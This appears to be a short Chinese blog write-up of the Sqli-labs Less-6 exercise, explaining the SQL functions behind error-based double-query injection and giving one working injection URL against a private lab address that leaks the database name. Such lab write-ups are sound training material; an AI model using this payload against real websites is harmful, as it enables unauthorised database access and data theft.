Sqli-labs

GET - Double Injection - Double Quotes - String（双引号的双注入）

步骤和上面一题一致，只是变成双引号

这次不妨换一种注法

rand()生成介于0~1之间的随机数
floor()向下舍入为指定小数位数
count()函数返回指定的值的数目
concat()将多个字符串连接成一个字符串
group by根据要求对结果排序

http://192.168.147.133/Less-6/?id=0" union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a%23

说实话这种普通注入，没有过滤的话用sqlmap最简单

[Sign]做不出ctf题的时候很痛苦，你只能眼睁睁看着其他人领先你

相关阅读:
go笔记
 脚本
 php-log
idea maven scala
Corporative Network
uva1160
比map更强大的multimap
Message Decowding
kmp 的next 数组求法
 Nearest Common Ancestors
原文地址：https://www.cnblogs.com/echoDetected/p/12830952.html

热门文章
Housse Robber II | leetcode
leetCode | House Robber
解析const
管理你的内存
 const 修饰函数
 swarm
go 笔记
 postgresql 笔记
 linux
test